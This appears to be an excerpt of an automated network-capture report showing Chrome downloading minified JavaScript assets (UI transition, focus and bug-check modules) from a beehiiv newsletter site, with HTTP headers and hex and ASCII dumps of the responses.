                                                                                                                                            Data Ascii: L,g as re,C as ae}from"./keyboard-CaEu2o0u.js";import{p as oe}from"./bugs-DVQzBh-s.js";function Te(){return/iPhone/gi.test(window.navigator.platform)||/Mac/gi.test(window.navigator.platform)&&window.navigator.maxTouchPoints>0}function Ce(){return/Android/
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 3d 3e 7b 76 61 72 20 64 2c 6e 3b 6c 2e 63 75 72 72 65 6e 74 26 26 28 66 2e 63 75 72 72 65 6e 74 3d 28 28 6e 3d 28 64 3d 69 2e 63 6f 6d 70 6f 73 65 64 50 61 74 68 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 69 29 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 6e 5b 30 5d 29 7c 7c 69 2e 74 61 72 67 65 74 29 7d 2c 21 30 29 2c 6b 28 22 63 6c 69 63 6b 22 2c 69 3d 3e 7b 46 65 28 29 7c 7c 66 2e 63 75 72 72 65 6e 74 26 26 28 63 28 69 2c 28 29 3d 3e 66 2e 63 75 72 72 65 6e 74 29 2c 66 2e 63 75 72 72 65 6e 74 3d 6e 75 6c 6c 29 7d 2c 21 30 29 2c 6b 28 22 74 6f 75 63 68 65 6e 64 22 2c 69 3d 3e 63 28 69 2c 28 29 3d 3e 69 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 3f 69 2e 74 61 72 67 65 74 3a 6e 75 6c
                                                                                                                                            Data Ascii: =>{var d,n;l.current&&(f.current=((n=(d=i.composedPath)==null?void 0:d.call(i))==null?void 0:n[0])||i.target)},!0),k("click",i=>{Fe()||f.current&&(c(i,()=>f.current),f.current=null)},!0),k("touchend",i=>c(i,()=>i.target instanceof HTMLElement?i.target:nul
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 6c 69 74 28 22 2c 22 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2e 6d 61 70 28 73 3d 3e 73 2e 69 6e 63 6c 75 64 65 73 28 22 6d 73 22 29 3f 70 61 72 73 65 46 6c 6f 61 74 28 73 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 73 29 2a 31 65 33 29 2e 73 6f 72 74 28 28 73 2c 6d 29 3d 3e 6d 2d 73 29 3b 72 65 74 75 72 6e 20 6f 7d 29 2c 64 3d 66 2b 69 3b 69 66 28 64 21 3d 3d 30 29 7b 72 2e 67 72 6f 75 70 28 6f 3d 3e 7b 6f 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 28 29 2c 6f 2e 64 69 73 70 6f 73 65 28 29 7d 2c 64 29 2c 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 22 74 72 61 6e 73 69 74 69 6f 6e 72 75 6e 22 2c 73 3d 3e 7b 73 2e 74 61 72 67 65 74 3d 3d 3d 73 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 26 26 6f 2e 64 69 73 70 6f 73 65 28
                                                                                                                                            Data Ascii: lit(",").filter(Boolean).map(s=>s.includes("ms")?parseFloat(s):parseFloat(s)*1e3).sort((s,m)=>m-s);return o}),d=f+i;if(d!==0){r.group(o=>{o.setTimeout(()=>{t(),o.dispose()},d),o.addEventListener(e,"transitionrun",s=>{s.target===s.currentTarget&&o.dispose(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 28 74 3d 3e 74 2e 6c 65 6e 67 74 68 3e 31 29 7d 6c 65 74 20 55 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 55 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 54 72 61 6e 73 69 74 69 6f 6e 43 6f 6e 74 65 78 74 22 3b 76 61 72 20 4e 65 3d 28 65 3d 3e 28 65 2e 56 69 73 69 62 6c 65 3d 22 76 69 73 69 62 6c 65 22 2c 65 2e 48 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 2c 65 29 29 28 4e 65 7c 7c 7b 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 4f 65 28 29 7b 6c 65 74 20 65 3d 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 55 29 3b 69 66 28 65 3d 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 20 3c 54 72 61 6e 73 69 74 69 6f 6e 2e 43 68 69 6c 64 20 2f 3e 20 69 73 20 75 73 65 64 20 62 75 74 20 69 74 20 69 73 20 6d 69 73 73 69 6e 67 20 61
                                                                                                                                            Data Ascii: (t=>t.length>1)}let U=a.createContext(null);U.displayName="TransitionContext";var Ne=(e=>(e.Visible="visible",e.Hidden="hidden",e))(Ne||{});function Oe(){let e=a.useContext(U);if(e===null)throw new Error("A <Transition.Child /> is used but it is missing a
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 65 6e 74 2e 70 75 73 68 28 75 29 7d 29 5d 29 2c 74 3f 2e 63 68 61 69 6e 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 70 75 73 68 28 5b 67 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 75 3d 3e 7b 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 6d 61 70 28 28 5b 79 2c 53 5d 29 3d 3e 53 29 29 2e 74 68 65 6e 28 28 29 3d 3e 75 28 29 29 7d 29 5d 29 2c 76 3d 3d 3d 22 65 6e 74 65 72 22 3f 6f 2e 63 75 72 72 65 6e 74 3d 6f 2e 63 75 72 72 65 6e 74 2e 74 68 65 6e 28 28 29 3d 3e 74 3f 2e 77 61 69 74 2e 63 75 72 72 65 6e 74 29 2e 74 68 65 6e 28 28 29 3d 3e 70 28 76 29 29 3a 70 28 76 29 7d 29 2c 62 3d 4c 28 28 67 2c 76 2c 70 29 3d 3e 7b 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 73 2e 63 75 72 72 65 6e 74 5b 76 5d 2e 73 70 6c 69 63 65 28 30 29 2e 6d 61 70 28 28
                                                                                                                                            Data Ascii: ent.push(u)})]),t?.chains.current[v].push([g,new Promise(u=>{Promise.all(s.current[v].map(([y,S])=>S)).then(()=>u())})]),v==="enter"?o.current=o.current.then(()=>t?.wait.current).then(()=>p(v)):p(v)}),b=L((g,v,p)=>{Promise.all(s.current[v].splice(0).map((
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 28 7b 62 65 66 6f 72 65 45 6e 74 65 72 3a 63 2c 61 66 74 65 72 45 6e 74 65 72 3a 66 2c 62 65 66 6f 72 65 4c 65 61 76 65 3a 69 2c 61 66 74 65 72 4c 65 61 76 65 3a 64 7d 29 2c 56 3d 69 65 28 29 3b 61 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 56 26 26 78 3d 3d 3d 22 76 69 73 69 62 6c 65 22 26 26 75 2e 63 75 72 72 65 6e 74 3d 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 44 69 64 20 79 6f 75 20 66 6f 72 67 65 74 20 74 6f 20 70 61 73 73 74 68 72 6f 75 67 68 20 74 68 65 20 60 72 65 66 60 20 74 6f 20 74 68 65 20 61 63 74 75 61 6c 20 44 4f 4d 20 6e 6f 64 65 3f 22 29 7d 2c 5b 75 2c 78 2c 56 5d 29 3b 6c 65 74 20 66 65 3d 5a 26 26 21 24 2c 74 65 3d 24 26 26 68 26 26 5a 2c 76 65 3d 21 56 7c 7c 66 65 3f 22 69 64 6c 65 22 3a 68
                                                                                                                                            Data Ascii: ({beforeEnter:c,afterEnter:f,beforeLeave:i,afterLeave:d}),V=ie();a.useEffect(()=>{if(V&&x==="visible"&&u.current===null)throw new Error("Did you forget to passthrough the `ref` to the actual DOM node?")},[u,x,V]);let fe=Z&&!$,te=$&&h&&Z,ve=!V||fe?"idle":h
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 3d 28 6e 26 77 2e 4f 70 65 6e 29 3d 3d 3d 77 2e 4f 70 65 6e 29 2c 21 5b 21 30 2c 21 31 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 20 3c 54 72 61 6e 73 69 74 69 6f 6e 20 2f 3e 20 69 73 20 75 73 65 64 20 62 75 74 20 69 74 20 69 73 20 6d 69 73 73 69 6e 67 20 61 20 60 73 68 6f 77 3d 7b 74 72 75 65 20 7c 20 66 61 6c 73 65 7d 60 20 70 72 6f 70 2e 22 29 3b 6c 65 74 5b 6f 2c 73 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 72 3f 22 76 69 73 69 62 6c 65 22 3a 22 68 69 64 64 65 6e 22 29 2c 6d 3d 73 65 28 28 29 3d 3e 7b 73 28 22 68 69 64 64 65 6e 22 29 7d 29 2c 5b 62 2c 67 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 30 29 2c 76 3d 61 2e 75 73 65 52 65 66 28 5b 72 5d 29 3b 51 28 28 29 3d 3e 7b 62 21 3d 3d 21 31 26 26 76 2e
                                                                                                                                            Data Ascii: =(n&w.Open)===w.Open),![!0,!1].includes(r))throw new Error("A <Transition /> is used but it is missing a `show={true | false}` prop.");let[o,s]=a.useState(r?"visible":"hidden"),m=se(()=>{s("hidden")}),[b,g]=a.useState(!0),v=a.useRef([r]);Q(()=>{b!==!1&&v.
                                                                                                                                            2025-01-15 18:14:35 UTC44INData Raw: 65 62 75 67 49 64 3d 61 61 64 34 35 35 36 65 2d 32 35 65 37 2d 35 30 31 36 2d 62 66 31 64 2d 31 33 61 33 31 39 32 39 33 63 36 62 0a
                                                                                                                                            Data Ascii: ebugId=aad4556e-25e7-5016-bf1d-13a319293c6b


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            58192.168.2.1649779104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC559OUTGET /assets/use-is-mounted-BaHv16bB.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3599
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"e0f-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a72924c452-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 62 32 34 39 30 38 65 2d 61 66 36 34 2d 35 37 37 31 2d 38 33 36 37 2d 31 63 34 38 39 30 66 64 35 39 34 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b24908e-af64-5771-8367-1c4890fd594e")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 28 22 63 75 72 72 65 6e 74 22 29 26 26 65 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 6f 64 65 3f 65 2e 63 75 72 72 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 64 6f 63 75 6d 65 6e 74 7d 6c 65 74 20 64 3d 5b 22 5b 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3d 74 72 75 65 5d 22 2c 22 5b 74 61 62 69 6e 64 65 78 5d 22 2c 22 61 5b 68 72 65 66 5d 22 2c 22 61 72 65 61 5b 68 72 65 66 5d 22 2c 22 62 75 74 74 6f 6e 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 69 66 72 61 6d 65 22 2c 22 69 6e 70 75 74 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 73 65 6c 65 63 74 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 2c 22 74 65 78 74 61 72 65 61 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 5d 2e 6d 61 70 28
                                                                                                                                            Data Ascii: ("current")&&e.current instanceof Node?e.current.ownerDocument:document}let d=["[contentEditable=true]","[tabindex]","a[href]","area[href]","button:not([disabled])","iframe","input:not([disabled])","select:not([disabled])","textarea:not([disabled])"].map(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3d 22 22 29 7d 2c 21 30 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 3d 3e 7b 65 2e 64 65 74 61 69 6c 3d 3d 3d 31 3f 64 65 6c 65 74 65 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3a 65 2e 64 65 74 61 69 6c 3d 3d 3d 30 26 26 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 61 74 61 73 65 74 2e 68 65 61 64 6c 65 73 73 75 69 46 6f 63 75 73 56 69 73 69 62 6c 65 3d 22 22 29 7d 2c 21 30 29 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 65 3f 2e 66 6f 63 75 73 28 7b 70
                                                                                                                                            Data Ascii: et.headlessuiFocusVisible="")},!0),document.addEventListener("click",e=>{e.detail===1?delete document.documentElement.dataset.headlessuiFocusVisible:e.detail===0&&(document.documentElement.dataset.headlessuiFocusVisible="")},!0));function I(e){e?.focus({p
                                                                                                                                            2025-01-15 18:14:35 UTC397INData Raw: 65 7b 69 66 28 75 3c 30 29 72 65 74 75 72 6e 20 33 3b 69 66 28 75 3e 3d 61 29 72 65 74 75 72 6e 20 31 7d 69 3d 6f 5b 75 5d 2c 69 3f 2e 66 6f 63 75 73 28 4e 29 2c 63 2b 3d 45 7d 77 68 69 6c 65 28 69 21 3d 3d 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 72 65 74 75 72 6e 20 74 26 36 26 26 4c 28 69 29 26 26 69 2e 73 65 6c 65 63 74 28 29 2c 32 7d 66 75 6e 63 74 69 6f 6e 20 52 28 29 7b 6c 65 74 20 65 3d 70 2e 75 73 65 52 65 66 28 21 31 29 3b 72 65 74 75 72 6e 20 46 28 28 29 3d 3e 28 65 2e 63 75 72 72 65 6e 74 3d 21 30 2c 28 29 3d 3e 7b 65 2e 63 75 72 72 65 6e 74 3d 21 31 7d 29 2c 5b 5d 29 2c 65 7d 65 78 70 6f 72 74 7b 4b 20 61 73 20 44 2c 44 20 61 73 20 49 2c 77 20 61 73 20 4d 2c 79 20 61 73 20 4e 2c 54 20 61 73 20 4f 2c 4f 20 61 73 20 54 2c 47 20 61 73
                                                                                                                                            Data Ascii: e{if(u<0)return 3;if(u>=a)return 1}i=o[u],i?.focus(N),c+=E}while(i!==s.activeElement);return t&6&&L(i)&&i.select(),2}function R(){let e=p.useRef(!1);return F(()=>(e.current=!0,()=>{e.current=!1}),[]),e}export{K as D,D as I,w as M,y as N,T as O,O as T,G as


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            59192.168.2.1649782104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC549OUTGET /assets/bugs-DVQzBh-s.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC904INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 900
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"384-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a8eecb5e70-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC465INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 39 61 37 36 34 30 36 2d 63 39 30 39 2d 35 38 30 38 2d 62 30 39 66 2d 36 37 63 36 66 34 30 37 62 37 37 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9a76406-c909-5808-b09f-67c6f407b774")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC435INData Raw: 6e 75 6c 6c 3b 66 6f 72 28 3b 65 26 26 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 46 69 65 6c 64 53 65 74 45 6c 65 6d 65 6e 74 29 3b 29 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 4c 65 67 65 6e 64 45 6c 65 6d 65 6e 74 26 26 28 6e 3d 65 29 2c 65 3d 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 6c 65 74 20 72 3d 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 3d 3d 3d 22 22 3b 72 65 74 75 72 6e 20 72 26 26 6f 28 6e 29 3f 21 31 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 65 3d 74 2e 70 72 65 76 69 6f 75 73 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 66 6f 72 28 3b 65 21 3d 3d 6e 75 6c 6c 3b 29 7b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                            Data Ascii: null;for(;e&&!(e instanceof HTMLFieldSetElement);)e instanceof HTMLLegendElement&&(n=e),e=e.parentElement;let r=e?.getAttribute("disabled")==="";return r&&o(n)?!1:r}function o(t){if(!t)return!1;let e=t.previousElementSibling;for(;e!==null;){if(e instanceo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            60192.168.2.1649781104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC551OUTGET /assets/hidden-KuoXmiN5.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC904INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 933
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3a5-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a8eb308c54-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC465INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 65 32 62 34 37 34 63 2d 36 62 62 30 2d 35 30 34 37 2d 39 63 37 37 2d 66 36 65 66 62 37 35 38 39 32 63 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e2b474c-6bb0-5047-9c77-f6efb75892c1")}catch(
